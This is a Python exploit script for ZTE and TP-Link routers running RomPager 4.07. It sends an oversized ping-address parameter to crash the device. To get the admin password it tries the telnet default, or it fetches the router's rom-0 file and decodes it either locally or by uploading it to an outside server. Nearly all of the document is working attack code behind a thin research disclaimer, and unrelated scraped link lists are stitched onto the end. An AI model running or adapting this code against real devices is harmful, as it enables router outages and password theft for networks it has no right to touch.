ZTE and TP-Link RomPager - DoS Exploit
#!/usr/bin/env python
# -*- coding: utf-8 -*- # Exploit Title: ZTE and TP-Link RomPager DoS Exploit
# Date: 10-05-2014
# Server Version: RomPager/4.07 UPnP/1.0
# Tested Routers: ZTE ZXV10 W300
# TP-Link TD-W8901G
# TP-Link TD-W8101G
# TP-Link TD-8840G
# Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
# Tested on: Kali Linux x86
#
# Notes: Please note this exploit may contain errors, and
# is provided "as it is". There is no guarantee
# that it will work on your target router(s), as
# the code may have to be adapted.
# This is to avoid script kiddie abuse as well.
#
# Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
# Author takes no responsibility for any kind of damage you cause.
#
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
#
# Original write-up: https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
# Video: https://www.youtube.com/watch?v=1fSECo2ewoo
# Dedicate to Nick Knight and Hood3dRob1n
#
# ./dos.py -i 192.168.1.1 import os
import re
import sys
import time
import urllib
import base64
import httplib
import urllib2
import requests
import optparse
import telnetlib
import subprocess
import collections
import unicodedata class BitReader: def __init__(self, bytes):
self._bits = collections.deque() for byte in bytes:
byte = ord(byte)
for n in xrange(8):
self._bits.append(bool((byte >> (7-n)) & 1)) def getBit(self):
return self._bits.popleft() def getBits(self, num):
res = 0
for i in xrange(num):
res += self.getBit() << num-1-i
return res def getByte(self):
return self.getBits(8) def __len__(self):
return len(self._bits) class RingList: def __init__(self, length):
self.__data__ = collections.deque()
self.__full__ = False
self.__max__ = length def append(self, x):
if self.__full__:
self.__data__.popleft()
self.__data__.append(x)
if self.size() == self.__max__:
self.__full__ = True def get(self):
return self.__data__ def size(self):
return len(self.__data__) def maxsize(self):
return self.__max__ def __getitem__(self, n):
if n >= self.size():
return None
return self.__data__[n] def filter_non_printable(str):
return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9]) def banner():
return ''' \t\t _/_/_/ _/_/_/
\t\t _/ _/ _/_/ _/
\t\t _/ _/ _/ _/ _/_/
\t\t _/ _/ _/ _/ _/
\t\t_/_/_/ _/_/ _/_/_/ '''
def dos(host, password):
while (1):
url = 'http://' +host+ '/Forms/tools_test_1'
parameters = {
'Test_PVC' : 'PVC0',
'PingIPAddr' : '\101'*2000,
'pingflag' : '1',
'trace_open_flag' : '0',
'InfoDisplay' : '+-+Info+-%0D%0A'
} params = urllib.urlencode(parameters) req = urllib2.Request(url, params)
base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '')
req.add_header("Authorization", "Basic %s" %base64string)
req.add_header("Content-type", "application/x-www-form-urlencoded")
req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm")
try:
print '[~] Sending Payload'
response = urllib2.urlopen(req, timeout=1)
sys.exit(0) except:
flag = checkHost(host)
if flag == 0:
print '[+] The host is still up and running'
else:
print '[~] Success! The host is down'
sys.exit(0)
break def checkHost(host):
if sys.platform == 'win32':
c = "ping -n 2 " + host
else:
c = "ping -c 2 " + host try:
x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
return x except:
pass def checkServer(host):
connexion = httplib.HTTPConnection(host)
connexion.request("GET", "/status.html")
response = connexion.getresponse()
server = response.getheader("server")
connexion.close()
time.sleep(2)
if server == 'RomPager/4.07 UPnP/1.0':
return 0
else:
return 1 def checkPassword(host):
print '[+] Checking for default password'
defaultpass = 'admin'
tn = telnetlib.Telnet(host, 23, 4)
tn.read_until("Password: ")
tn.write(defaultpass + '\n')
time.sleep(2)
banner = tn.read_eager()
banner = regex(len(defaultpass)*r'.'+'\w+' , banner)
tn.write("exit\n")
tn.close()
time.sleep(4)
if banner == 'Copyright':
print '[+] Default password is being used'
dos(host, defaultpass)
else:
print '[!] Default Password is not being used'
while True:
msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower()
try:
if msg[0] == 'y':
password = decodePasswordLocal(host)
print '[*] Router password is: ' +password
dos(host, password)
break
if msg[0] == 'n':
password = decodePasswordRemote(host)
print '[*] Router password is: ' +password
dos(host, password)
break
else:
print '[!] Enter a valid choice'
except Exception, e:
print e
continue def decodePasswordRemote(host):
fname = 'rom-0'
if os.path.isfile(fname) == True:
os.remove(fname)
urllib.urlretrieve ("http://"+host+"/rom-0", fname)
# If this URL goes down you might have to find one and change this function.
# You can also use the local decoder. It might have few errors in getting output.
url = 'http://198.61.167.113/zynos/decoded.php' # Target URL
files = {'uploadedfile': open('rom-0', 'rb') } # The rom-0 file we wanna upload
data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # Additional Parameters we need to include
headers = { 'User-agent' : 'Python Demo Agent v1' } # Any additional Headers you want to send or include res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False )
res1 =res.content
p = re.search('rows=10>(.*)', res1)
if p:
passwd = found = p.group(1)
else:
password = 'NotFound'
return passwd def decodePasswordLocal(host):
# Sometimes this might output a wrong password while finding the exact string.
# print the result as mentioned below and manually find out
fname = 'rom-0'
if os.path.isfile(fname) == True:
os.remove(fname)
urllib.urlretrieve ("http://"+host+"/rom-0", fname)
fpos=8568
fend=8788
fhandle=file('rom-0')
fhandle.seek(fpos)
chunk="*"
amount=221
while fpos < fend:
if fend-fpos < amount:
amount = amount
data = fhandle.read(amount)
fpos += len(data) reader = BitReader(data)
result = '' window = RingList(2048) while True:
bit = reader.getBit()
if not bit:
char = reader.getByte()
result += chr(char)
window.append(char)
else:
bit = reader.getBit()
if bit:
offset = reader.getBits(7)
if offset == 0:
break
else:
offset = reader.getBits(11) lenField = reader.getBits(2)
if lenField < 3:
lenght = lenField + 2
else:
lenField <<= 2
lenField += reader.getBits(2)
if lenField < 15:
lenght = (lenField & 0x0f) + 5
else:
lenCounter = 0
lenField = reader.getBits(4)
while lenField == 15:
lenField = reader.getBits(4)
lenCounter += 1
lenght = 15*lenCounter + 8 + lenField for i in xrange(lenght):
char = window[-offset]
result += chr(char)
window.append(char) result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')
# In case the password you see is wrong while filtering, manually print it from here and findout.
#print result
if 'TP-LINK' in result:
result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';
result = result.replace("TP-LINK", "")
result = result[1:] if 'ZTE' in result:
result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';
result = result.replace("ZTE", "")
result = result[1:] if 'tc160' in result:
result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';
result = result.replace("tc160", "")
result = result[1:]
return result def regex(path, text):
match = re.search(path, text)
if match:
return match.group()
else:
return None def main():
if sys.platform == 'win32':
os.system('cls')
else:
os.system('clear')
try:
print banner()
print '''
|=--------=[ ZTE and TP-Link RomPager Denial of Service Exploit ]=-------=|\n
[*] Author: Osanda Malith Jayathissa
[*] Follow @OsandaMalith
[!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
[!] Author takes no responsibility for any kind of damage you cause. '''
parser = optparse.OptionParser("usage: %prog -i <IP Address> ")
parser.add_option('-i', dest='host',
type='string',
help='Specify the IP to attack')
(options, args) = parser.parse_args() if options.host is None:
parser.print_help()
exit(-1) host = options.host
x = checkHost(host) if x == 0:
print '[+] The host is up and running'
server = checkServer(host)
if server == 0:
checkPassword(host)
else:
print ('[!] Sorry the router is not running RomPager')
else:
print '[!] The host is not up and running'
sys.exit(0) except KeyboardInterrupt:
print '[!] Ctrl + C detected\n[!] Exiting'
sys.exit(0)
except EOFError:
print '[!] Ctrl + D detected\n[!] Exiting'
sys.exit(0) if __name__ == "__main__":
main()
#EOF
ZTE and TP-Link RomPager - DoS Exploit的更多相关文章
- Metasploit辅助模块
msf > show auxiliary Auxiliary ========= Name Di ...
- Man手册--nmap
目录 nmap使用手册 附录: nmap使用手册 附录: NMAP(1) Nmap Reference Guide NMAP(1) NAME nmap - Network exploration to ...
- CentOS 6.5 安全加固及性能优化 (转)
通过修改CentOS 6.5 的系统默认设置,对系统进行安全加固,进行系统的性能优化. 环境: 系统硬件:vmware vsphere (CPU:2*4核,内存2G) 系统版本:Centos-6.5- ...
- 配置windows路由表,使电脑同时连接内网外网方法
1.环境一(系统:windows xp,内网.外网不是同一类地址,内网地址固定): 外网:通过笔记本的无线网卡连接: 内网:通过笔记本的本地连接: 第一步,连接网线,配置本地连接地址,注意IP地址不要 ...
- IMS Global Learning Tools Interoperability™ Implementation Guide
Final Version 1.1 Date Issued: 13 March 2012 Latest version: http://www.imsglobal ...
- TP-Link 无线路由器设置图文教程----怎么设置TP-Link无线路由器图解
转自:http://www.jb51.net/softjc/39399.html 无线路由器的基础配置 在我们第一次配置无线宽带路由器时,参照说明书找到无线宽带路由器默认的IP地址是192.168.1 ...
- Delphi 使用之函数
函数由一句或多句代码组成,可以实现某个特定的功能.使用函数可以使代码更加易读.易懂,加快编程速度及减少重复代码.过程与函数类似,过程与函数最重要的区别在于,过程没有返回值,而函数能有返回值. ...
- 花生壳+Tomcat
花生壳(内网穿透)新手上路 http://service.oray.com/question/1664.html 好不容易找到一篇关于“花生壳+Tomcat”的好文章,转一下,上次自己弄的时候把自己的 ...
- 无线路由器WDS设置方法图解_无线桥接设置
随着无线网络的发展,现在越来越多的公司及企业都已经开始布局无线局域网,今天我们主要介绍下适合中小企业的无线路由器桥接或WDS功能.文章以TP-link WR841N无线路由器设置为例,其它路由器参考设 ...
随机推荐
- 启动tomcat时,报错:IOException while loading persisted sessions: java.io.EOFException解决方法
报错原因:加载持久化session错误,tomcat加载时读取的文件是是*.ser,session序列化文件,文件的位置是tomcat\work\Catalina\localhost,找到sessio ...
- VC++2013出现bug: 无法打开源文件“stdafx.h”
VC++2013出现bug: 无法打开源文件“stdafx.h” 1.首先需要把#include "stdafx.h"置于最头 2.在解决方案资源管理器中添加以下几个文件(附图下)
- Ubuntu 12.04 Virtualbox 启用USB 设备支持
转载自:http://www.cnblogs.com/ericsun/archive/2013/06/10/3130679.html 具体步骤在上面的链接中 今天在ubuntu下安装了Virtualb ...
- (转)pymysql 连接mysql数据库---不支持中文解决
往数据库里插入中文时出现异常:UnicodeEncodeError: 'latin-1' codec can't encode characters 就是编码的问题,pymysql默认的编码是lati ...
- log4jWARN Please initialize the log4j system properly解决办法
原因是没有对log4j这个jar进行文件配置. 要解决这个问题非常简单,建立LOG4J 的配置文件即可.在src 目录下创建配置文件,选择菜单File > New > File,文件名输入 ...
- 搭建一个简单的Struts2(Struts2_HelloWorld)
1.导入Jar包 2.配置web.xml 1 <?xml version="1.0" encoding="UTF-8"?> 2 <web-ap ...
- Spring AOP中pointcut expression表达式解析
Pointcut 是指那些方法需要被执行"AOP",是由"Pointcut Expression"来描述的. Pointcut可以有下列方式来定义或者通过&am ...
- ctags使用细节
在src code目录中运行下面的命令(我自己使用的命令): $ctags --langmap=c++:.h --languages=c++,c,perl,verilog -R 其中,指定cta ...
- jquery.select2 模糊查询
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <link re ...
- Libpci库的调用
这几天发现在Redhat AS6.5 X86_64下用outl(index, 0xcf8)和inl(0xcfc)下读取PCIe配置空间是系统有时性的会hang, 于是去寻找解决方案,首先想到的是用/d ...